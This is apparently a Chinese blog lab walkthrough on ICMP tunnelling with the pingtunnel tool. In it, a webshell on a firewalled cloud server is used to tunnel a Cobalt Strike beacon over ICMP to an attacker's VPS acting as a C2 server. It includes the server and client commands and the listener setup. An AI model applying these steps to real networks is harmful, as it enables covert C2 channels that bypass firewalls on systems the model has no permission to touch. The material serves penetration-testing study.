首页 > 其他分享 >内网-ICMP隧道(pingtunnel)

内网-ICMP隧道(pingtunnel)

时间:2024-04-30 16:16:44浏览次数:18  
标签:domain 隧道 端口 pingtunnel ICMP 内网 服务端

 

 

常用的隧道技术:

利用各种隧道技术,以网络防火墙允许的协议,

绕过网络防火墙的封锁,实现访问被封锁的目标网络

网络层:IPv6 隧道、ICMP 隧道

传输层:TCP 隧道、UDP 隧道、常规端口转发

应用层:SSH 隧道、HTTP/S 隧道、DNS 隧道

 

协议 判断命令

ICMP ping ip or domain

HTTP   curl ip or domain

SSH    ssh  ip or domain

DNS     nslookup domain

TCP     telnet ip port

... ................

环境准备

本机作为攻击机,一台vps作为C2服务器,以及隧道服务端。

靶机使用一台云服务器,开启防火墙。

 出站入站规则全部禁止,入站规则中添加web,允许访问80端口。

 出站规则中允许ICMP

 使用webshell连接web服务器。首先直接上传CS后门执行发现无法上线,之后信息收集,得到出网协议为ICMP。

 

隧道搭建

相关项目
https://github.com/esrrhs/pingtunnel

首先将工具上传至VPS启动服务端

./pingtunnel -type server

之后将工具通过webshell上传,在客户端启动

pingtunnel -type client -l :3333 -s x.x.x.x -t x.x.x.x:4444 -tcp 1 -noprint 1 -nolog 1

这条命令中,-l后的端口为本机端口,-s后为服务端IP,-t后为服务端地址以及端口。

之后连接成功后,服务端会有结果返回。

 在CS中需要新建两个监听器,一个监听器监听本机的地址端口,需要使用这个监听器生成后门,之后上传运行。

 因为流量为HTTP,经过隧道转发后到了VPS上服务端的相关端口上,所以监听对应的端口。

 之后执行发现可以上线。

 

标签:domain,隧道,端口,pingtunnel,ICMP,内网,服务端
From: https://www.cnblogs.com/re8sd/p/18168172

相关文章

  • 内网渗透-防火墙上线方案
    windows防火墙默认规则为入站阻止,出站允许。场景一:SQL服务器配置了防火墙 在单向防火墙中,攻击机可以使用正向,也可以使用反向上线web服务器,SQL服务器使用反向上线场景二:WEB服务器配置了防火墙 在此场景中,攻击机需要使用反向来上线WEB服务器,SQL服务器使用正向上线。场景三:W......
  • 使用自己云服务器frp内网穿透记录
     1.前提是自己现有云服务器已经 2.下载对应的版本,我使用的是052.3下载地址https://github.com/fatedier/frp/releases需要注意:下载的linux版本是服务端。windows是客户端后续需要修改对用的配置文件 3.解压linux 3.1编辑配置文件vifrps.toml bind......
  • 利用frp+Linux+Windows实现内网穿透
    准备工作1、一台拥有公网IP的服务器(本文档使用:Ubuntu22.04.2LTS(GNU/Linux5.15.0-76-genericx86_64))2、frp:Linux服务端+Windows客户端安装部署1、下载地址:https://github.com/fatedier/frp/releases一、服务端部署1.创建目录mkdir-p/usr/local/etc/frp上传安装包fr......
  • 使用SSH从公网服务器简易使用内网任意机器服务,比如从外部下载代码
    如果有一个台外部的机器waibu-host,位于阿里云,腾讯云,亚马逊,azure云等等; 假设你想从这个waibu-host上访问公司任意服务,下载代码,访问http服务,等等,或者你机器上的服务,不需要额外工具,只要ssh反向就可以实现; 借个图,如下: 举个例子,如果你想从公司内部......
  • 军工单位安全内网文件导出,怎样做到严密的安全管控?
    军工单位是指承担国家下达的军事装备、产品研制、生产计划任务的企、事业单位,主要包括电子工业部、航空工业总公司、航天工业总公司、兵器工业总公司、核工业总公司、船舶工业总公司、中国工程物理研究院及各省国防工业办公室等。 军工单位的特点主要体现在以下几个方面:承担......
  • 内网信息收集命令汇总
    查看网络配置信息ipconfig/all查看操作系统及软件信息查看操作系统和版本信息systeminfo|findstr/B/C:"OS"查看系统体系结构echo%PROCESSOR_ARCHITECTURE%查看安装的软件及版本、路径等wmicproductgetname,versionpowershell"Get-WmiObject-classWi......
  • 最近对接通联支付第三方平台,支付成功后要回调方法告知支付是否成功,通知url必须为直接
    最近公司要做PC端,微信小程序端支付,对接的第三方是通联支付,因为需要用到回调方法,所以想到了natapp内网穿透的方法给通联支付提供回调的地址访问我本机项目第一步:打开natapp,注册账号https://natapp.cn/新手的话,需要购买免费隧道,不用花钱 我几年前已经申请账号也购买免费......
  • eBPF指定网口丢弃icmp报文
    安装eBPF依赖#安装编译工具aptinstall-yllvmclang#确认内核具有BTF支持,路径存在,内核没有BTF支持,使用vmlinux.h无法通过编译ls/sys/kernel/btf#生成vmlinux.h#aptinstall-ylinux-tools-genericaptinstall-ylinux-tools-6.5.0-26-genericbpftoolbtfdump......
  • 【攻防实操系列+内网渗透篇】--第2章:内网渗透攻击基础①
    以域控为基础架构,通过域控实现对用户和计算机资源的统一管理,带来便利的同时也成为了最受攻击者重点攻击的集权系统。针对域控的攻击技术,在Windows通用攻击技术的基础上自成一套技术体系,将AD域攻防分为信息收集、权限提升、凭证窃取、横向移动、权限维持等攻击阶段,把域环境下众多......
  • 【攻防实操系列+内网渗透篇】--第3章:内网渗透防护基础①
    针对AD域安全防护产品,商业的如MicrosoftDefenderforIdentity、Tenable.ad、ITDR-AD,开源的WatchAD,都是可以选择的方向。面对众多的AD域攻击行为,我们也可以选择自建检测策略,通过分析AD域控的日志,对攻击行为进行实时检测。将AD域日志引入日志分析平台,通过模拟域攻击行为产生攻击......